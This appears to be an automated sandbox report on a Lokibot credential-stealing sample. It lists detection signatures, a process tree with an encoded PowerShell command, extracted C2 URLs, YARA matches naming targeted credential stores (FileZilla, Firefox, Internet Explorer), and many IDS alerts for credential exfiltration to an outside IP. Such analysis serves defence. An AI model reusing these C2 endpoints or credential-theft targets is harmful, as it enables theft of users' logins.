Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
Analysis ID:756117
MD5:3039fa7b347872c33c247581a27a7560
SHA1:69832bbe446653f7d10eccf07069e73230138af8
SHA256:f949fda96d4810c4ffa941ecce00160b984cf7ac32cf1ca88dd4dd9583f2e480
Tags:exe
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Lokibot
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Encrypted powershell cmdline option found
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe (PID: 5092 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe MD5: 3039FA7B347872C33C247581A27A7560)
    • powershell.exe (PID: 1508 cmdline: "powershell" Get-Date MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • svchost.exe (PID: 2084 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • powershell.exe (PID: 1376 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegAsm.exe (PID: 2084 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://sedesadre.gq/PKZ/PWS/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.521369809.0000000003243000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
    • 0x437f:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
    00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
          00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x17f10:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          Click to see the 25 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
          • 0x13e78:$s1: http://
          • 0x17633:$s1: http://
          • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
          • 0x13e80:$s2: https://
          • 0x13e78:$f1: http://
          • 0x17633:$f1: http://
          • 0x13e80:$f2: https://
          0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpackINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
                • 0x16536:$f1: FileZilla\recentservers.xml
                • 0x16576:$f2: FileZilla\sitemanager.xml
                • 0x147e6:$b2: Mozilla\Firefox\Profiles
                • 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                • 0x146fa:$s4: logins.json
                • 0x155a4:$s6: wand.dat
                • 0x14024:$a1: username_value
                • 0x14014:$a2: password_value
                • 0x1465f:$a3: encryptedUsername
                • 0x146cc:$a3: encryptedUsername
                • 0x14672:$a4: encryptedPassword
                • 0x146e0:$a4: encryptedPassword
                Click to see the 34 entries

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                Timestamp:192.168.2.7141.98.6.10249731802021641 11/29/22-16:52:33.757391
                SID:2021641
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249720802025381 11/29/22-16:52:28.227779
                SID:2025381
                Source Port:49720
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249717802025381 11/29/22-16:52:26.668343
                SID:2025381
                Source Port:49717
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249726802025381 11/29/22-16:52:31.339365
                SID:2025381
                Source Port:49726
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249725802024313 11/29/22-16:52:30.920170
                SID:2024313
                Source Port:49725
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249725802024318 11/29/22-16:52:30.920170
                SID:2024318
                Source Port:49725
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249716802024317 11/29/22-16:52:25.029133
                SID:2024317
                Source Port:49716
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249722802021641 11/29/22-16:52:29.504056
                SID:2021641
                Source Port:49722
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249716802024312 11/29/22-16:52:25.029133
                SID:2024312
                Source Port:49716
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249718802825766 11/29/22-16:52:27.285136
                SID:2825766
                Source Port:49718
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249719802021641 11/29/22-16:52:27.785438
                SID:2021641
                Source Port:49719
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249727802825766 11/29/22-16:52:31.817491
                SID:2825766
                Source Port:49727
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249721802825766 11/29/22-16:52:28.704063
                SID:2825766
                Source Port:49721
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249730802825766 11/29/22-16:52:33.273429
                SID:2825766
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249728802021641 11/29/22-16:52:32.198993
                SID:2021641
                Source Port:49728
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249730802025381 11/29/22-16:52:33.273429
                SID:2025381
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249721802021641 11/29/22-16:52:28.704063
                SID:2021641
                Source Port:49721
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249727802021641 11/29/22-16:52:31.817491
                SID:2021641
                Source Port:49727
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249717802825766 11/29/22-16:52:26.668343
                SID:2825766
                Source Port:49717
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249732802021641 11/29/22-16:52:36.325135
                SID:2021641
                Source Port:49732
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497182025483 11/29/22-16:52:27.393637
                SID:2025483
                Source Port:80
                Destination Port:49718
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249718802025381 11/29/22-16:52:27.285136
                SID:2025381
                Source Port:49718
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249728802825766 11/29/22-16:52:32.198993
                SID:2825766
                Source Port:49728
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497212025483 11/29/22-16:52:28.798694
                SID:2025483
                Source Port:80
                Destination Port:49721
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497202025483 11/29/22-16:52:28.346106
                SID:2025483
                Source Port:80
                Destination Port:49720
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249717802024312 11/29/22-16:52:26.668343
                SID:2024312
                Source Port:49717
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249726802021641 11/29/22-16:52:31.339365
                SID:2021641
                Source Port:49726
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249723802024318 11/29/22-16:52:30.023507
                SID:2024318
                Source Port:49723
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249720802024318 11/29/22-16:52:28.227779
                SID:2024318
                Source Port:49720
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497242025483 11/29/22-16:52:30.593492
                SID:2025483
                Source Port:80
                Destination Port:49724
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497252025483 11/29/22-16:52:31.018575
                SID:2025483
                Source Port:80
                Destination Port:49725
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249731802025381 11/29/22-16:52:33.757391
                SID:2025381
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249722802025381 11/29/22-16:52:29.504056
                SID:2025381
                Source Port:49722
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249717802024317 11/29/22-16:52:26.668343
                SID:2024317
                Source Port:49717
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249723802024313 11/29/22-16:52:30.023507
                SID:2024313
                Source Port:49723
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249716802025381 11/29/22-16:52:25.029133
                SID:2025381
                Source Port:49716
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249719802025381 11/29/22-16:52:27.785438
                SID:2025381
                Source Port:49719
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249720802024313 11/29/22-16:52:28.227779
                SID:2024313
                Source Port:49720
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249725802025381 11/29/22-16:52:30.920170
                SID:2025381
                Source Port:49725
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249726802825766 11/29/22-16:52:31.339365
                SID:2825766
                Source Port:49726
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249718802021641 11/29/22-16:52:27.285136
                SID:2021641
                Source Port:49718
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249732802825766 11/29/22-16:52:36.325135
                SID:2825766
                Source Port:49732
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249727802025381 11/29/22-16:52:31.817491
                SID:2025381
                Source Port:49727
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497282025483 11/29/22-16:52:32.293466
                SID:2025483
                Source Port:80
                Destination Port:49728
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249729802021641 11/29/22-16:52:32.689634
                SID:2021641
                Source Port:49729
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249730802021641 11/29/22-16:52:33.273429
                SID:2021641
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249724802021641 11/29/22-16:52:30.488585
                SID:2021641
                Source Port:49724
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249731802024313 11/29/22-16:52:33.757391
                SID:2024313
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249722802024318 11/29/22-16:52:29.504056
                SID:2024318
                Source Port:49722
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249725802021641 11/29/22-16:52:30.920170
                SID:2021641
                Source Port:49725
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249728802024318 11/29/22-16:52:32.198993
                SID:2024318
                Source Port:49728
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249719802024318 11/29/22-16:52:27.785438
                SID:2024318
                Source Port:49719
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249732802025381 11/29/22-16:52:36.325135
                SID:2025381
                Source Port:49732
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249731802024318 11/29/22-16:52:33.757391
                SID:2024318
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249723802025381 11/29/22-16:52:30.023507
                SID:2025381
                Source Port:49723
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249722802024313 11/29/22-16:52:29.504056
                SID:2024313
                Source Port:49722
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249719802024313 11/29/22-16:52:27.785438
                SID:2024313
                Source Port:49719
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249716802021641 11/29/22-16:52:25.029133
                SID:2021641
                Source Port:49716
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497312025483 11/29/22-16:52:33.852928
                SID:2025483
                Source Port:80
                Destination Port:49731
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497302025483 11/29/22-16:52:33.400113
                SID:2025483
                Source Port:80
                Destination Port:49730
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497322025483 11/29/22-16:52:36.428850
                SID:2025483
                Source Port:80
                Destination Port:49732
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249728802024313 11/29/22-16:52:32.198993
                SID:2024313
                Source Port:49728
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249724802825766 11/29/22-16:52:30.488585
                SID:2825766
                Source Port:49724
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249729802825766 11/29/22-16:52:32.689634
                SID:2825766
                Source Port:49729
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249727802024313 11/29/22-16:52:31.817491
                SID:2024313
                Source Port:49727
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249723802825766 11/29/22-16:52:30.023507
                SID:2825766
                Source Port:49723
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249721802024313 11/29/22-16:52:28.704063
                SID:2024313
                Source Port:49721
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249724802025381 11/29/22-16:52:30.488585
                SID:2025381
                Source Port:49724
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249721802024318 11/29/22-16:52:28.704063
                SID:2024318
                Source Port:49721
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497272025483 11/29/22-16:52:31.911870
                SID:2025483
                Source Port:80
                Destination Port:49727
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497292025483 11/29/22-16:52:32.805162
                SID:2025483
                Source Port:80
                Destination Port:49729
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249727802024318 11/29/22-16:52:31.817491
                SID:2024318
                Source Port:49727
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249729802025381 11/29/22-16:52:32.689634
                SID:2025381
                Source Port:49729
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249716802825766 11/29/22-16:52:25.029133
                SID:2825766
                Source Port:49716
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249719802825766 11/29/22-16:52:27.785438
                SID:2825766
                Source Port:49719
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249725802825766 11/29/22-16:52:30.920170
                SID:2825766
                Source Port:49725
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249717802021641 11/29/22-16:52:26.668343
                SID:2021641
                Source Port:49717
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497222025483 11/29/22-16:52:29.613062
                SID:2025483
                Source Port:80
                Destination Port:49722
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249726802024313 11/29/22-16:52:31.339365
                SID:2024313
                Source Port:49726
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249722802825766 11/29/22-16:52:29.504056
                SID:2825766
                Source Port:49722
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497232025483 11/29/22-16:52:30.124555
                SID:2025483
                Source Port:80
                Destination Port:49723
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497262025483 11/29/22-16:52:31.441372
                SID:2025483
                Source Port:80
                Destination Port:49726
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249732802024313 11/29/22-16:52:36.325135
                SID:2024313
                Source Port:49732
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249726802024318 11/29/22-16:52:31.339365
                SID:2024318
                Source Port:49726
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249728802025381 11/29/22-16:52:32.198993
                SID:2025381
                Source Port:49728
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249723802021641 11/29/22-16:52:30.023507
                SID:2021641
                Source Port:49723
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249732802024318 11/29/22-16:52:36.325135
                SID:2024318
                Source Port:49732
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249720802021641 11/29/22-16:52:28.227779
                SID:2021641
                Source Port:49720
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249718802024318 11/29/22-16:52:27.285136
                SID:2024318
                Source Port:49718
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497192025483 11/29/22-16:52:27.888790
                SID:2025483
                Source Port:80
                Destination Port:49719
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249729802024318 11/29/22-16:52:32.689634
                SID:2024318
                Source Port:49729
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249731802825766 11/29/22-16:52:33.757391
                SID:2825766
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249729802024313 11/29/22-16:52:32.689634
                SID:2024313
                Source Port:49729
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249730802024318 11/29/22-16:52:33.273429
                SID:2024318
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249730802024313 11/29/22-16:52:33.273429
                SID:2024313
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249721802025381 11/29/22-16:52:28.704063
                SID:2025381
                Source Port:49721
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249724802024318 11/29/22-16:52:30.488585
                SID:2024318
                Source Port:49724
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249718802024313 11/29/22-16:52:27.285136
                SID:2024313
                Source Port:49718
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249720802825766 11/29/22-16:52:28.227779
                SID:2825766
                Source Port:49720
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249724802024313 11/29/22-16:52:30.488585
                SID:2024313
                Source Port:49724
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeReversingLabs: Detection: 14%
                Antivirus / Scanner detection for submitted sample
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeAvira: detected
                Machine Learning detection for sample
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeJoe Sandbox ML: detected
                Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://sedesadre.gq/PKZ/PWS/fre.php"]}
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.7:49716 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49716 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49716 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.7:49716 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49716 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.7:49717 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49717 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49717 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.7:49717 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49717 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49718 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49718 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49718 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49718 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49718 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49718
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49719 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49719 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49719 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49719 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49719 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49719
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49720 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49720 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49720 -> 141.98.6.102:80
